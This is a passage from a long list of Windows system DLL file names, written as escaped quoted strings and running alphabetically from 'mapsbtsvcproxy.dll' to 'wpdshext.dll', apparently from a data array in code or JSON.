\"mapsbtsvcproxy.dll\", \"mapscsp.dll\", \"mapsstore.dll\", \"mapstoasttask.dll\", \"mapsupdatetask.dll\", \"mbaeapi.dll\", \"mbaeapipublic.dll\", \"mbaexmlparser.dll\", \"mbmediamanager.dll\", \"mbsmsapi.dll\", \"mbussdapi.dll\", \"mccsengineshared.dll\", \"mccspal.dll\", \"mciavi32.dll\", \"mcicda.dll\", \"mciqtz32.dll\", \"mciseq.dll\", \"mciwave.dll\", \"mcrecvsrc.dll\", \"mdmcommon.dll\", \"mdmdiagnostics.dll\", \"mdminst.dll\", \"mdmmigrator.dll\", \"mdmregistration.dll\", \"memorydiagnostic.dll\", \"messagingservice.dll\", \"mf.dll\", 
\"mf3216.dll\", \"mfaacenc.dll\", \"mfasfsrcsnk.dll\", \"mfaudiocnv.dll\", \"mfc42.dll\", \"mfc42u.dll\", \"mfcaptureengine.dll\", \"mfcore.dll\", \"mfcsubs.dll\", \"mfds.dll\", \"mfdvdec.dll\", \"mferror.dll\", \"mfh263enc.dll\", \"mfh264enc.dll\", \"mfksproxy.dll\", \"mfmediaengine.dll\", \"mfmjpegdec.dll\", \"mfmkvsrcsnk.dll\", \"mfmp4srcsnk.dll\", \"mfmpeg2srcsnk.dll\", \"mfnetcore.dll\", \"mfnetsrc.dll\", \"mfperfhelper.dll\", \"mfplat.dll\", \"mfplay.dll\", \"mfps.dll\", \"mfreadwrite.dll\", \"mfsensorgroup.dll\", \"mfsrcsnk.dll\", \"mfsvr.dll\", \"mftranscode.dll\", \"mfvdsp.dll\", \"mfvfw.dll\", \"mfwmaaec.dll\", \"mgmtapi.dll\", \"mi.dll\", \"mibincodec.dll\", \"midimap.dll\", \"migisol.dll\", \"miguiresource.dll\", \"mimefilt.dll\", \"mimofcodec.dll\", \"minstoreevents.dll\", \"miracastinputmgr.dll\", \"miracastreceiver.dll\", \"mirrordrvcompat.dll\", \"mispace.dll\", \"mitigationclient.dll\", \"miutils.dll\", \"mlang.dll\", \"mmcbase.dll\", \"mmcndmgr.dll\", \"mmcshext.dll\", \"mmdevapi.dll\", \"mmgaclient.dll\", \"mmgaproxystub.dll\", \"mmres.dll\", \"mobilenetworking.dll\", \"modemui.dll\", \"modernexecserver.dll\", \"moricons.dll\", \"moshost.dll\", \"moshostclient.dll\", \"moshostcore.dll\", \"mosstorage.dll\", \"mp3dmod.dll\", \"mp43decd.dll\", \"mp4sdecd.dll\", \"mpeval.dll\", \"mpg4decd.dll\", \"mpr.dll\", \"mprapi.dll\", \"mprddm.dll\", \"mprdim.dll\", \"mprext.dll\", \"mprmsg.dll\", \"mpssvc.dll\", \"mpunits.dll\", \"mrmcorer.dll\", \"mrmdeploy.dll\", \"mrmindexer.dll\", \"mrt100.dll\", \"mrt_map.dll\", \"msaatext.dll\", \"msac3enc.dll\", \"msacm32.dll\", \"msafd.dll\", \"msajapi.dll\", \"msalacdecoder.dll\", \"msalacencoder.dll\", \"msamrnbdecoder.dll\", \"msamrnbencoder.dll\", \"msamrnbsink.dll\", \"msamrnbsource.dll\", \"msasn1.dll\", \"msauddecmft.dll\", \"msaudite.dll\", \"msauserext.dll\", \"mscandui.dll\", \"mscat32.dll\", \"msclmd.dll\", \"mscms.dll\", \"mscoree.dll\", \"mscorier.dll\", \"mscories.dll\", \"msctf.dll\", 
\"msctfmonitor.dll\", \"msctfp.dll\", \"msctfui.dll\", \"msctfuimanager.dll\", \"msdadiag.dll\", \"msdart.dll\", \"msdelta.dll\", \"msdmo.dll\", \"msdrm.dll\", \"msdtckrm.dll\", \"msdtclog.dll\", \"msdtcprx.dll\", \"msdtcspoffln.dll\", \"msdtctm.dll\", \"msdtcuiu.dll\", \"msdtcvsp1res.dll\", \"msfeeds.dll\", \"msfeedsbs.dll\", \"msflacdecoder.dll\", \"msflacencoder.dll\", \"msftedit.dll\", \"msheif.dll\", \"mshtml.dll\", \"mshtmldac.dll\", \"mshtmled.dll\", \"mshtmler.dll\", \"msi.dll\", \"msicofire.dll\", \"msidcrl40.dll\", \"msident.dll\", \"msidle.dll\", \"msidntld.dll\", \"msieftp.dll\", \"msihnd.dll\", \"msiltcfg.dll\", \"msimg32.dll\", \"msimsg.dll\", \"msimtf.dll\", \"msisip.dll\", \"msiso.dll\", \"msiwer.dll\", \"mskeyprotcli.dll\", \"mskeyprotect.dll\", \"msls31.dll\", \"msmpeg2adec.dll\", \"msmpeg2enc.dll\", \"msmpeg2vdec.dll\", \"msobjs.dll\", \"msoert2.dll\", \"msopusdecoder.dll\", \"mspatcha.dll\", \"mspatchc.dll\", \"msphotography.dll\", \"msports.dll\", \"msprivs.dll\", \"msrahc.dll\", \"msrating.dll\", \"msrawimage.dll\", \"msrdc.dll\", \"msrdpwebaccess.dll\", \"msrle32.dll\", \"msscntrs.dll\", \"mssecuser.dll\", \"mssign32.dll\", \"mssip32.dll\", \"mssitlb.dll\", \"mssph.dll\", \"mssprxy.dll\", \"mssrch.dll\", \"mssvp.dll\", \"mstask.dll\", \"mstextprediction.dll\", \"mstscax.dll\", \"msutb.dll\", \"msv1_0.dll\", \"msvcirt.dll\", \"msvcp110_win.dll\", \"msvcp120_clr0400.dll\", \"msvcp140_clr0400.dll\", \"msvcp60.dll\", \"msvcp_win.dll\", \"msvcr100_clr0400.dll\", \"msvcr120_clr0400.dll\", \"msvcrt.dll\", \"msvfw32.dll\", \"msvidc32.dll\", \"msvidctl.dll\", \"msvideodsp.dll\", \"msvp9dec.dll\", \"msvproc.dll\", \"msvpxenc.dll\", \"mswb7.dll\", \"mswebp.dll\", \"mswmdm.dll\", \"mswsock.dll\", \"msxml3.dll\", \"msxml3r.dll\", \"msxml6.dll\", \"msxml6r.dll\", \"msyuv.dll\", \"mtcmodel.dll\", \"mtf.dll\", \"mtfappserviceds.dll\", \"mtfdecoder.dll\", \"mtffuzzyds.dll\", \"mtfserver.dll\", \"mtfspellcheckds.dll\", \"mtxclu.dll\", \"mtxdm.dll\", 
\"mtxex.dll\", \"mtxoci.dll\", \"muifontsetup.dll\", \"mycomput.dll\", \"mydocs.dll\", \"napcrypt.dll\", \"napinsp.dll\", \"naturalauth.dll\", \"naturallanguage6.dll\", \"navshutdown.dll\", \"ncaapi.dll\", \"ncasvc.dll\", \"ncbservice.dll\", \"ncdautosetup.dll\", \"ncdprop.dll\", \"nci.dll\", \"ncobjapi.dll\", \"ncrypt.dll\", \"ncryptprov.dll\", \"ncryptsslp.dll\", \"ncsi.dll\", \"ncuprov.dll\", \"nddeapi.dll\", \"ndfapi.dll\", \"ndfetw.dll\", \"ndfhcdiscovery.dll\", \"ndishc.dll\", \"ndproxystub.dll\", \"nduprov.dll\", \"negoexts.dll\", \"netapi32.dll\", \"netbios.dll\", \"netcenter.dll\", \"netcfgx.dll\", \"netcorehc.dll\", \"netdiagfx.dll\", \"netdriverinstall.dll\", \"netevent.dll\", \"netfxperf.dll\", \"neth.dll\", \"netid.dll\", \"netiohlp.dll\", \"netjoin.dll\", \"netlogon.dll\", \"netman.dll\", \"netmsg.dll\", \"netplwiz.dll\", \"netprofm.dll\", \"netprofmsvc.dll\", \"netprovfw.dll\", \"netprovisionsp.dll\", \"netsetupapi.dll\", \"netsetupengine.dll\", \"netsetupshim.dll\", \"netsetupsvc.dll\", \"netshell.dll\", \"nettrace.dll\", \"netutils.dll\", \"networkexplorer.dll\", \"networkhelper.dll\", \"networkicon.dll\", \"networkproxycsp.dll\", \"networkstatus.dll\", \"networkuxbroker.dll\", \"newdev.dll\", \"nfcradiomedia.dll\", \"ngccredprov.dll\", \"ngcctnr.dll\", \"ngcctnrsvc.dll\", \"ngcisoctnr.dll\", \"ngckeyenum.dll\", \"ngcksp.dll\", \"ngclocal.dll\", \"ngcpopkeysrv.dll\", \"ngcprocsp.dll\", \"ngcrecovery.dll\", \"ngcsvc.dll\", \"ngctasks.dll\", \"ninput.dll\", \"nlaapi.dll\", \"nlahc.dll\", \"nlasvc.dll\", \"nlhtml.dll\", \"nlmgp.dll\", \"nlmproxy.dll\", \"nlmsprep.dll\", \"nlsbres.dll\", \"nlsdata0000.dll\", \"nlsdata0009.dll\", \"nlsdl.dll\", \"nlslexicons0009.dll\", \"nmadirect.dll\", \"normaliz.dll\", \"npmproxy.dll\", \"npsm.dll\", \"nrpsrv.dll\", \"nshhttp.dll\", \"nshipsec.dll\", \"nshwfp.dll\", \"nsi.dll\", \"nsisvc.dll\", \"ntasn1.dll\", \"ntdll.dll\", \"ntdsapi.dll\", \"ntlanman.dll\", \"ntlanui2.dll\", \"ntlmshared.dll\", \"ntmarta.dll\", 
\"ntprint.dll\", \"ntshrui.dll\", \"ntvdm64.dll\", \"objsel.dll\", \"occache.dll\", \"ocsetapi.dll\", \"odbc32.dll\", \"odbcbcp.dll\", \"odbcconf.dll\", \"odbccp32.dll\", \"odbccr32.dll\", \"odbccu32.dll\", \"odbcint.dll\", \"odbctrac.dll\", \"oemlicense.dll\", \"offfilt.dll\", \"officecsp.dll\", \"offlinelsa.dll\", \"offlinesam.dll\", \"offreg.dll\", \"ole32.dll\", \"oleacc.dll\", \"oleacchooks.dll\", \"oleaccrc.dll\", \"oleaut32.dll\", \"oledlg.dll\", \"oleprn.dll\", \"omadmagent.dll\", \"omadmapi.dll\", \"onebackuphandler.dll\", \"onex.dll\", \"onexui.dll\", \"opcservices.dll\", \"opengl32.dll\", \"ortcengine.dll\", \"osbaseln.dll\", \"osksupport.dll\", \"osuninst.dll\", \"p2p.dll\", \"p2pgraph.dll\", \"p2pnetsh.dll\", \"p2psvc.dll\", \"packager.dll\", \"panmap.dll\", \"pautoenr.dll\", \"pcacli.dll\", \"pcadm.dll\", \"pcaevts.dll\", \"pcasvc.dll\", \"pcaui.dll\", \"pcpksp.dll\", \"pcsvdevice.dll\", \"pcwum.dll\", \"pcwutl.dll\", \"pdh.dll\", \"pdhui.dll\", \"peerdist.dll\", \"peerdistad.dll\", \"peerdistcleaner.dll\", \"peerdistsh.dll\", \"peerdistsvc.dll\", \"peopleapis.dll\", \"peopleband.dll\", \"perceptiondevice.dll\", \"perfctrs.dll\", \"perfdisk.dll\", \"perfnet.dll\", \"perfos.dll\", \"perfproc.dll\", \"perfts.dll\", \"phoneom.dll\", \"phoneproviders.dll\", \"phoneservice.dll\", \"phoneserviceres.dll\", \"phoneutil.dll\", \"phoneutilres.dll\", \"photowiz.dll\", \"pickerplatform.dll\", \"pid.dll\", \"pidgenx.dll\", \"pifmgr.dll\", \"pimstore.dll\", \"pkeyhelper.dll\", \"pktmonapi.dll\", \"pku2u.dll\", \"pla.dll\", \"playlistfolder.dll\", \"playsndsrv.dll\", \"playtodevice.dll\", \"playtomanager.dll\", \"playtomenu.dll\", \"playtoreceiver.dll\", \"ploptin.dll\", \"pmcsnap.dll\", \"pngfilt.dll\", \"pnidui.dll\", \"pnpclean.dll\", \"pnppolicy.dll\", \"pnpts.dll\", \"pnpui.dll\", \"pnpxassoc.dll\", \"pnpxassocprx.dll\", \"pnrpauto.dll\", \"pnrphc.dll\", \"pnrpnsp.dll\", \"pnrpsvc.dll\", \"policymanager.dll\", \"polstore.dll\", \"posetup.dll\", 
\"posyncservices.dll\", \"pots.dll\", \"powercpl.dll\", \"powrprof.dll\", \"ppcsnap.dll\", \"prauthproviders.dll\", \"prflbmsg.dll\", \"printui.dll\", \"printwsdahost.dll\", \"prm0009.dll\", \"prncache.dll\", \"prnfldr.dll\", \"prnntfy.dll\", \"prntvpt.dll\", \"profapi.dll\", \"profext.dll\", \"profprov.dll\", \"profsvc.dll\", \"profsvcext.dll\", \"propsys.dll\", \"provcore.dll\", \"provdatastore.dll\", \"provdiagnostics.dll\", \"provengine.dll\", \"provhandlers.dll\", \"provisioningcsp.dll\", \"provmigrate.dll\", \"provops.dll\", \"provplugineng.dll\", \"provsysprep.dll\", \"provthrd.dll\", \"proximitycommon.dll\", \"proximityservice.dll\", \"prvdmofcomp.dll\", \"psapi.dll\", \"pshed.dll\", \"psisdecd.dll\", \"psmsrv.dll\", \"pstask.dll\", \"pstorec.dll\", \"ptpprov.dll\", \"puiapi.dll\", \"puiobj.dll\", \"pushtoinstall.dll\", \"pwlauncher.dll\", \"pwrshplugin.dll\", \"pwsso.dll\", \"qasf.dll\", \"qcap.dll\", \"qdv.dll\", \"qdvd.dll\", \"qedit.dll\", \"qedwipes.dll\", \"qmgr.dll\", \"query.dll\", \"quiethours.dll\", \"qwave.dll\", \"racengn.dll\", \"racpldlg.dll\", \"radardt.dll\", \"radarrs.dll\", \"radcui.dll\", \"rasadhlp.dll\", \"rasapi32.dll\", \"rasauto.dll\", \"raschap.dll\", \"raschapext.dll\", \"rasctrs.dll\", \"rascustom.dll\", \"rasdiag.dll\", \"rasdlg.dll\", \"rasgcw.dll\", \"rasman.dll\", \"rasmans.dll\", \"rasmbmgr.dll\", \"rasmediamanager.dll\", \"rasmm.dll\", \"rasmontr.dll\", \"rasplap.dll\", \"rasppp.dll\", \"rastapi.dll\", \"rastls.dll\", \"rastlsext.dll\", \"rdbui.dll\", \"rdpbase.dll\", \"rdpcfgex.dll\", \"rdpcore.dll\", \"rdpcorets.dll\", \"rdpencom.dll\", \"rdpendp.dll\", \"rdpnano.dll\", \"rdpsaps.dll\", \"rdpserverbase.dll\", \"rdpsharercom.dll\", \"rdpudd.dll\", \"rdpviewerax.dll\", \"rdsappxhelper.dll\", \"rdsdwmdr.dll\", \"rdvvmtransport.dll\", \"rdxservice.dll\", \"rdxtaskfactory.dll\", \"reagent.dll\", \"reagenttask.dll\", \"recovery.dll\", \"regapi.dll\", \"regctrl.dll\", \"regidle.dll\", \"regsvc.dll\", \"reguwpapi.dll\", 
\"reinfo.dll\", \"remotepg.dll\", \"remotewipecsp.dll\", \"reportingcsp.dll\", \"resampledmo.dll\", \"resbparser.dll\", \"reseteng.dll\", \"resetengine.dll\", \"resetengonline.dll\", \"resourcemapper.dll\", \"resutils.dll\", \"rgb9rast.dll\", \"riched20.dll\", \"riched32.dll\", \"rjvmdmconfig.dll\", \"rmapi.dll\", \"rmclient.dll\", \"rnr20.dll\", \"roamingsecurity.dll\", \"rometadata.dll\", \"rotmgr.dll\", \"rpcepmap.dll\", \"rpchttp.dll\", \"rpcns4.dll\", \"rpcnsh.dll\", \"rpcrt4.dll\", \"rpcrtremote.dll\", \"rpcss.dll\", \"rsaenh.dll\", \"rshx32.dll\", \"rstrtmgr.dll\", \"rtffilt.dll\", \"rtm.dll\", \"rtmediaframe.dll\", \"rtmmvrortc.dll\", \"rtutils.dll\", \"rtworkq.dll\", \"rulebasedds.dll\", \"samcli.dll\", \"samlib.dll\", \"samsrv.dll\", \"sas.dll\", \"sbe.dll\", \"sbeio.dll\", \"sberes.dll\", \"sbservicetrigger.dll\", \"scansetting.dll\", \"scardbi.dll\", \"scarddlg.dll\", \"scardsvr.dll\", \"scavengeui.dll\", \"scdeviceenum.dll\", \"scecli.dll\", \"scesrv.dll\", \"schannel.dll\", \"schedcli.dll\", \"schedsvc.dll\", \"scksp.dll\", \"scripto.dll\", \"scrobj.dll\", \"scrptadm.dll\", \"scrrun.dll\", \"sdcpl.dll\", \"sdds.dll\", \"sdengin2.dll\", \"sdfhost.dll\", \"sdhcinst.dll\", \"sdiageng.dll\", \"sdiagprv.dll\", \"sdiagschd.dll\", \"sdohlp.dll\", \"sdrsvc.dll\", \"sdshext.dll\", \"searchfolder.dll\", \"sechost.dll\", \"seclogon.dll\", \"secproc.dll\", \"secproc_isv.dll\", \"secproc_ssp.dll\", \"secproc_ssp_isv.dll\", \"secur32.dll\", \"security.dll\", \"semgrps.dll\", \"semgrsvc.dll\", \"sendmail.dll\", \"sens.dll\", \"sensapi.dll\", \"sensorsapi.dll\", \"sensorscpl.dll\", \"sensorservice.dll\", \"sensorsnativeapi.dll\", \"sensorsutilsv2.dll\", \"sensrsvc.dll\", \"serialui.dll\", \"servicinguapi.dll\", \"serwvdrv.dll\", \"sessenv.dll\", \"setbcdlocale.dll\", \"settingmonitor.dll\", \"settingsync.dll\", \"settingsynccore.dll\", \"setupapi.dll\", \"setupcl.dll\", \"setupcln.dll\", \"setupetw.dll\", \"sfc.dll\", \"sfc_os.dll\", \"sgrmenclave.dll\", 
\"shacct.dll\", \"shacctprofile.dll\", \"sharedpccsp.dll\", \"sharedrealitysvc.dll\", \"sharehost.dll\", \"sharemediacpl.dll\", \"shcore.dll\", \"shdocvw.dll\", \"shell32.dll\", \"shellstyle.dll\", \"shfolder.dll\", \"shgina.dll\", \"shimeng.dll\", \"shimgvw.dll\", \"shlwapi.dll\", \"shpafact.dll\", \"shsetup.dll\", \"shsvcs.dll\", \"shunimpl.dll\", \"shutdownext.dll\", \"shutdownux.dll\", \"shwebsvc.dll\", \"signdrv.dll\", \"simauth.dll\", \"simcfg.dll\", \"skci.dll\", \"slc.dll\", \"slcext.dll\", \"slwga.dll\", \"smartscreenps.dll\", \"smbhelperclass.dll\", \"smbwmiv2.dll\", \"smiengine.dll\", \"smphost.dll\", \"smsroutersvc.dll\", \"sndvolsso.dll\", \"snmpapi.dll\", \"socialapis.dll\", \"softkbd.dll\", \"softpub.dll\", \"sortwindows61.dll\", \"sortwindows62.dll\", \"spacebridge.dll\", \"spacecontrol.dll\", \"spatializerapo.dll\", \"spatialstore.dll\", \"spbcd.dll\", \"speechpal.dll\", \"spfileq.dll\", \"spinf.dll\", \"spmpm.dll\", \"spnet.dll\", \"spoolss.dll\", \"spopk.dll\", \"spp.dll\", \"sppc.dll\", \"sppcext.dll\", \"sppcomapi.dll\", \"sppcommdlg.dll\", \"sppinst.dll\", \"sppnp.dll\", \"sppobjs.dll\", \"sppwinob.dll\", \"sppwmi.dll\", \"spwinsat.dll\", \"spwizeng.dll\", \"spwizimg.dll\", \"spwizres.dll\", \"spwmp.dll\", \"sqlsrv32.dll\", \"sqmapi.dll\", \"srchadmin.dll\", \"srclient.dll\", \"srcore.dll\", \"srevents.dll\", \"srh.dll\", \"srhelper.dll\", \"srm.dll\", \"srmclient.dll\", \"srmlib.dll\", \"srmscan.dll\", \"srmshell.dll\", \"srmstormod.dll\", \"srmtrace.dll\", \"srm_ps.dll\", \"srpapi.dll\", \"srrstr.dll\", \"srumapi.dll\", \"srumsvc.dll\", \"srvcli.dll\", \"srvsvc.dll\", \"srwmi.dll\", \"sscore.dll\", \"sscoreext.dll\", \"ssdm.dll\", \"ssdpapi.dll\", \"ssdpsrv.dll\", \"sspicli.dll\", \"sspisrv.dll\", \"ssshim.dll\", \"sstpsvc.dll\", \"starttiledata.dll\", \"startupscan.dll\", \"stclient.dll\", \"sti.dll\", \"sti_ci.dll\", \"stobject.dll\", \"storageusage.dll\", \"storagewmi.dll\", \"storewuauth.dll\", \"storprop.dll\", \"storsvc.dll\", 
\"streamci.dll\", \"structuredquery.dll\", \"sud.dll\", \"svf.dll\", \"svsvc.dll\", \"swprv.dll\", \"sxproxy.dll\", \"sxs.dll\", \"sxshared.dll\", \"sxssrv.dll\", \"sxsstore.dll\", \"synccenter.dll\", \"synccontroller.dll\", \"synchostps.dll\", \"syncproxy.dll\", \"syncreg.dll\", \"syncres.dll\", \"syncsettings.dll\", \"syncutil.dll\", \"sysclass.dll\", \"sysfxui.dll\", \"sysmain.dll\", \"sysntfy.dll\", \"syssetup.dll\", \"systemcpl.dll\", \"t2embed.dll\", \"tabbtn.dll\", \"tabbtnex.dll\", \"tabsvc.dll\", \"tapi3.dll\", \"tapi32.dll\", \"tapilua.dll\", \"tapimigplugin.dll\", \"tapiperf.dll\", \"tapisrv.dll\", \"tapisysprep.dll\", \"tapiui.dll\", \"taskapis.dll\", \"taskbarcpl.dll\", \"taskcomp.dll\", \"taskschd.dll\", \"taskschdps.dll\", \"tbauth.dll\", \"tbs.dll\", \"tcbloader.dll\", \"tcpipcfg.dll\", \"tcpmib.dll\", \"tcpmon.dll\", \"tcpmonui.dll\", \"tdh.dll\", \"tdlmigration.dll\", \"tellib.dll\", \"termmgr.dll\", \"termsrv.dll\", \"tetheringclient.dll\", \"tetheringmgr.dll\", \"tetheringservice.dll\", \"tetheringstation.dll\", \"textshaping.dll\", \"themecpl.dll\", \"themeservice.dll\", \"themeui.dll\", \"threadpoolwinrt.dll\", \"thumbcache.dll\", \"timebrokerclient.dll\", \"timebrokerserver.dll\", \"timesync.dll\", \"timesynctask.dll\", \"tlscsp.dll\", \"tokenbinding.dll\", \"tokenbroker.dll\", \"tokenbrokerui.dll\", \"tpmcertresources.dll\", \"tpmcompc.dll\", \"tpmtasks.dll\", \"tpmvsc.dll\", \"tquery.dll\", \"traffic.dll\", \"transportdsa.dll\", \"trie.dll\", \"trkwks.dll\", \"tsbyuv.dll\", \"tscfgwmi.dll\", \"tserrredir.dll\", \"tsf3gip.dll\", \"tsgqec.dll\", \"tsmf.dll\", \"tspkg.dll\", \"tspubwmi.dll\", \"tssessionux.dll\", \"tssrvlic.dll\", \"tsworkspace.dll\", \"ttdloader.dll\", \"ttdplm.dll\", \"ttdrecord.dll\", \"ttdrecordcpu.dll\", \"ttlsauth.dll\", \"ttlscfg.dll\", \"ttlsext.dll\", \"tvratings.dll\", \"twext.dll\", \"twinapi.dll\", \"twinui.dll\", \"txflog.dll\", \"txfw32.dll\", \"tzautoupdate.dll\", \"tzres.dll\", \"tzsyncres.dll\", \"ubpm.dll\", 
\"ucmhc.dll\", \"ucrtbase.dll\", \"ucrtbase_clr0400.dll\", \"ucrtbase_enclave.dll\", \"udhisapi.dll\", \"udwm.dll\", \"ueficsp.dll\", \"uexfat.dll\", \"ufat.dll\", \"uiamanager.dll\", \"uianimation.dll\", \"uiautomationcore.dll\", \"uicom.dll\", \"uireng.dll\", \"uiribbon.dll\", \"uiribbonres.dll\", \"ulib.dll\", \"umb.dll\", \"umdmxfrm.dll\", \"umpdc.dll\", \"umpnpmgr.dll\", \"umpo-overrides.dll\", \"umpo.dll\", \"umpoext.dll\", \"umpowmi.dll\", \"umrdp.dll\", \"unattend.dll\", \"unenrollhook.dll\", \"unimdmat.dll\", \"uniplat.dll\", \"unistore.dll\", \"untfs.dll\", \"updateagent.dll\", \"updatecsp.dll\", \"updatepolicy.dll\", \"upnp.dll\", \"upnphost.dll\", \"upshared.dll\", \"urefs.dll\", \"urefsv1.dll\", \"ureg.dll\", \"url.dll\", \"urlmon.dll\", \"usbcapi.dll\", \"usbceip.dll\", \"usbmon.dll\", \"usbperf.dll\", \"usbpmapi.dll\", \"usbtask.dll\", \"usbui.dll\", \"user32.dll\", \"usercpl.dll\", \"userdataservice.dll\", \"userdatatimeutil.dll\", \"userenv.dll\", \"userinitext.dll\", \"usermgr.dll\", \"usermgrcli.dll\", \"usermgrproxy.dll\", \"usoapi.dll\", \"usocoreps.dll\", \"usosvc.dll\", \"usp10.dll\", \"ustprov.dll\", \"utcutil.dll\", \"utildll.dll\", \"uudf.dll\", \"uvcmodel.dll\", \"uwfcfgmgmt.dll\", \"uwfcsp.dll\", \"uwfservicingapi.dll\", \"uxinit.dll\", \"uxlib.dll\", \"uxlibres.dll\", \"uxtheme.dll\", \"vac.dll\", \"van.dll\", \"vault.dll\", \"vaultcds.dll\", \"vaultcli.dll\", \"vaultroaming.dll\", \"vaultsvc.dll\", \"vbsapi.dll\", \"vbscript.dll\", \"vbssysprep.dll\", \"vcardparser.dll\", \"vdsbas.dll\", \"vdsdyn.dll\", \"vdsutil.dll\", \"vdsvd.dll\", \"vds_ps.dll\", \"verifier.dll\", \"version.dll\", \"vertdll.dll\", \"vfuprov.dll\", \"vfwwdm32.dll\", \"vhfum.dll\", \"vid.dll\", \"videohandlers.dll\", \"vidreszr.dll\", \"virtdisk.dll\", \"vmbuspipe.dll\", \"vmdevicehost.dll\", \"vmictimeprovider.dll\", \"vmrdvcore.dll\", \"voiprt.dll\", \"vpnike.dll\", \"vpnikeapi.dll\", \"vpnsohdesktop.dll\", \"vpnv2csp.dll\", \"vscmgrps.dll\", \"vssapi.dll\", 
\"vsstrace.dll\", \"vss_ps.dll\", \"w32time.dll\", \"w32topl.dll\", \"waasassessment.dll\", \"waasmediccapsule.dll\", \"waasmedicps.dll\", \"waasmedicsvc.dll\", \"wabsyncprovider.dll\", \"walletproxy.dll\", \"walletservice.dll\", \"wavemsp.dll\", \"wbemcomn.dll\", \"wbiosrvc.dll\", \"wci.dll\", \"wcimage.dll\", \"wcmapi.dll\", \"wcmcsp.dll\", \"wcmsvc.dll\", \"wcnapi.dll\", \"wcncsvc.dll\", \"wcneapauthproxy.dll\", \"wcneappeerproxy.dll\", \"wcnnetsh.dll\", \"wcnwiz.dll\", \"wc_storage.dll\", \"wdc.dll\", \"wdi.dll\", \"wdigest.dll\", \"wdscore.dll\", \"webauthn.dll\", \"webcamui.dll\", \"webcheck.dll\", \"webclnt.dll\", \"webio.dll\", \"webservices.dll\", \"websocket.dll\", \"wecapi.dll\", \"wecsvc.dll\", \"wephostsvc.dll\", \"wer.dll\", \"werconcpl.dll\", \"wercplsupport.dll\", \"werenc.dll\", \"weretw.dll\", \"wersvc.dll\", \"werui.dll\", \"wevtapi.dll\", \"wevtfwd.dll\", \"wevtsvc.dll\", \"wfapigp.dll\", \"wfdprov.dll\", \"wfdsconmgr.dll\", \"wfdsconmgrsvc.dll\", \"wfhc.dll\", \"whealogr.dll\", \"whhelper.dll\", \"wiaaut.dll\", \"wiadefui.dll\", \"wiadss.dll\", \"wiarpc.dll\", \"wiascanprofiles.dll\", \"wiaservc.dll\", \"wiashext.dll\", \"wiatrace.dll\", \"wificloudstore.dll\", \"wificonfigsp.dll\", \"wifidisplay.dll\", \"wimgapi.dll\", \"win32spl.dll\", \"win32u.dll\", \"winbio.dll\", \"winbiodatamodel.dll\", \"winbioext.dll\", \"winbrand.dll\", \"wincorlib.dll\", \"wincredprovider.dll\", \"wincredui.dll\", \"windowmanagement.dll\", \"windowscodecs.dll\", \"windowscodecsext.dll\", \"windowscodecsraw.dll\", \"windowsiotcsp.dll\", \"windowslivelogin.dll\", \"winethc.dll\", \"winhttp.dll\", \"winhttpcom.dll\", \"winhvemulation.dll\", \"winhvplatform.dll\", \"wininet.dll\", \"wininetlui.dll\", \"wininitext.dll\", \"winipcfile.dll\", \"winipcsecproc.dll\", \"winipsec.dll\", \"winlangdb.dll\", \"winlogonext.dll\", \"winmde.dll\", \"winml.dll\", \"winmm.dll\", \"winmmbase.dll\", \"winmsipc.dll\", \"winnlsres.dll\", \"winnsi.dll\", \"winreagent.dll\", \"winrnr.dll\", 
\"winrscmd.dll\", \"winrsmgr.dll\", \"winrssrv.dll\", \"winrttracing.dll\", \"winsatapi.dll\", \"winscard.dll\", \"winsetupui.dll\", \"winshfhc.dll\", \"winsku.dll\", \"winsockhc.dll\", \"winsqlite3.dll\", \"winsrpc.dll\", \"winsrv.dll\", \"winsrvext.dll\", \"winsta.dll\", \"winsync.dll\", \"winsyncmetastore.dll\", \"winsyncproviders.dll\", \"wintrust.dll\", \"wintypes.dll\", \"winusb.dll\", \"wirednetworkcsp.dll\", \"wisp.dll\", \"wkscli.dll\", \"wkspbrokerax.dll\", \"wksprtps.dll\", \"wkssvc.dll\", \"wlanapi.dll\", \"wlancfg.dll\", \"wlanconn.dll\", \"wlandlg.dll\", \"wlangpui.dll\", \"wlanhc.dll\", \"wlanhlp.dll\", \"wlanmediamanager.dll\", \"wlanmm.dll\", \"wlanmsm.dll\", \"wlanpref.dll\", \"wlanradiomanager.dll\", \"wlansec.dll\", \"wlansvc.dll\", \"wlansvcpal.dll\", \"wlanui.dll\", \"wlanutil.dll\", \"wldap32.dll\", \"wldp.dll\", \"wlgpclnt.dll\", \"wlidcli.dll\", \"wlidcredprov.dll\", \"wlidfdp.dll\", \"wlidnsp.dll\", \"wlidprov.dll\", \"wlidres.dll\", \"wlidsvc.dll\", \"wmadmod.dll\", \"wmadmoe.dll\", \"wmalfxgfxdsp.dll\", \"wmasf.dll\", \"wmcodecdspps.dll\", \"wmdmlog.dll\", \"wmdmps.dll\", \"wmdrmsdk.dll\", \"wmerror.dll\", \"wmi.dll\", \"wmiclnt.dll\", \"wmicmiplugin.dll\", \"wmidcom.dll\", \"wmidx.dll\", \"wmiprop.dll\", \"wmitomi.dll\", \"wmnetmgr.dll\", \"wmp.dll\", \"wmpdui.dll\", \"wmpdxm.dll\", \"wmpeffects.dll\", \"wmphoto.dll\", \"wmploc.dll\", \"wmpps.dll\", \"wmpshell.dll\", \"wmsgapi.dll\", \"wmspdmod.dll\", \"wmspdmoe.dll\", \"wmvcore.dll\", \"wmvdecod.dll\", \"wmvdspa.dll\", \"wmvencod.dll\", \"wmvsdecd.dll\", \"wmvsencd.dll\", \"wmvxencd.dll\", \"woftasks.dll\", \"wofutil.dll\", \"wordbreakers.dll\", \"workfoldersgpext.dll\", \"workfoldersres.dll\", \"workfoldersshell.dll\", \"workfolderssvc.dll\", \"wosc.dll\", \"wow64.dll\", \"wow64cpu.dll\", \"wow64win.dll\", \"wpbcreds.dll\", \"wpc.dll\", \"wpcapi.dll\", \"wpcdesktopmonsvc.dll\", \"wpcproxystubs.dll\", \"wpcrefreshtask.dll\", \"wpcwebfilter.dll\", \"wpdbusenum.dll\", \"wpdshext.dll\", 
